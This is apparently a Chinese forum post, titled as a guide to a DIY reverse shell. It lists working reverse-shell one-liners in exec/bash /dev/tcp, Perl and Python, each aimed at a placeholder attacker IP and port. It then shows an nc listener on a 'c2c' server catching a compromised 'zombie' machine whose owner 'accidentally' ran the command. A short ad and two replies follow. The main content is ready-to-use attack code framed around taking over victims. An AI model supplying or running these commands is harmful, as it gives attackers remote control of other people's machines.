如何DIY一个简单的反弹Shell脚本
利用exec弹
$ exec 5<> /dev/tcp/your-fuxking-public-ip/your-fuxking-port 0>&1 $ cat <&5 | while read line; do $line 2>&5 >&5; done
利用bash弹,在目标机器上执行
bash -i >& /dev/tcp/your-fuxking-public-ip/your-fuxking-port 0>&1
利用perl弹
perl -e 'use Socket;$i="your-fuxking-public-ip";$p=your-fuxking-port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
利用python弹
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your-fuxking-public-ip",your-fuxking-port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
挑个最简单的尝试一下吧,模型是最简单的肉鸡上线模型。
首先在c2c服务器上开6666端口,等待连接:
c2c
6666
# nc -l 6666
肉鸡 “不小心” 执行了我们的命令:
106.*.*.*那个打码的c2c服务器地址,6666是端口号。
106.*.*.*
上线!
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
静河流 你看都没人回你,一定是你长的不行,还是我支持你一下吧。[em_19]
roysue 难道web板块人气太低不是主要的原因么...我就是自己记个笔记防止以后忘记了而已[em_12]